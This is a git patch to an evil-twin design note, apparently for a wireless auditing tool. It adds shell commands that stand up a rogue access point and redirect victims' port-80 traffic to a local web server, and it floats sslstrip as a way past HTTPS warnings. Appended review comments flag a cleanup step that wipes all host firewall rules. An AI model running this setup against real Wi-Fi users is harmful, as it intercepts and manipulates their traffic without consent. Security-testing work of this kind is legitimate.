From 830e3794feddf0de37fa309d434656f29e58a7f3 Mon Sep 17 00:00:00 2001 From: derv82 Date: Tue, 17 Apr 2018 14:15:34 -0400 Subject: [PATCH] Added "proof-of-concept" commands to start AP & redirect traffic --- EVILTWIN.md | 50 ++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) diff --git a/EVILTWIN.md b/EVILTWIN.md index 8fdb109..0d6a6f5 100644 --- a/EVILTWIN.md +++ b/EVILTWIN.md @@ -147,6 +147,8 @@ TODO: * What about HTTPS traffic (port 443)? * We want to avoid browser warnings (scary in Chrome & Firefox). + * Don't think we can send a 302 redirect to port 80 without triggering the invalid certificate issue. + * sslstrip may get around this... DEAUTHING 
@@ -332,3 +334,51 @@ This deauthing should continue until all clients are deauthenticated from the Ev Then the script can be stopped. + +Proof of Concept +================ + +Start AP and capture all port-80 traffic: + +``` +ifconfig wlan0 10.0.0.1/24 up + +# start dnsmasq for dhcp & dns resolution (runs in background) +killall dnsmasq +dnsmasq -C dnsmasq.conf + +# reroute all port-80 traffic to our machine +iptables -N internet -t mangle +iptables -t mangle -A PREROUTING -j internet +iptables -t mangle -A internet -j MARK --set-mark 99 +iptables -t nat -A PREROUTING -m mark --mark 99 -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1 +echo "1" > /proc/sys/net/ipv4/ip_forward +iptables -A FORWARD -i eth0 -o wlan0 -m state --state ESTABLISHED,RELATED -j ACCEPT +iptables -A FORWARD -m mark --mark 99 -j REJECT +iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT +iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE + +# start wifi access point (new terminal) +killall hostapd +hostapd ./hostapd.conf -i wlan0 + +# start webserver on port 80 (new terminal) +python -m SimpleHTTPServer 80 +``` + +Cleanup: + +``` +# stop processes +# ctrl+c hostapd +# ctrl+c python simple http server +killall dnsmasq + +# reset iptables +iptables -F +iptables -X +iptables -t nat -F +iptables -t nat -X +iptables -t mangle -F +iptables -t mangle -X +```
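Review bot: the two new TODO bullets in the first hunk (lines 147-154 of EVILTWIN.md) leave "the invalid certificate issue" undefined; state plainly that a cleartext 302 cannot make a browser accept an HTTPS origin without a certificate that is valid for that name, so the redirect idea is a dead end rather than an open question, and mark the sslstrip bullet as untested so a later reader does not take "may get around this" as a confirmed result.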
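Review bot: the Cleanup block in the second hunk is destructive beyond what it set up. `iptables -F` / `iptables -X` on the filter, nat and mangle tables wipe every pre-existing rule and user chain on the host, not just the `internet` chain and the six rules added above, and `ip_forward` is left at 1. Suggest snapshotting with `iptables-save > /tmp/iptables.bak` before the setup block and restoring with `iptables-restore < /tmp/iptables.bak` in cleanup, plus `echo 0 > /proc/sys/net/ipv4/ip_forward`. Smaller points in the same hunk: `killall dnsmasq` and `killall hostapd` will also kill unrelated system instances (NetworkManager commonly runs its own dnsmasq), so use a pidfile or `--pid-file` for the instances this doc starts; `dnsmasq.conf` and `hostapd.conf` are referenced but neither included nor described in this patch, so the proof of concept is not reproducible from the document alone; and `python -m SimpleHTTPServer` is Python 2 only, so note `python3 -m http.server 80` as the current equivalent.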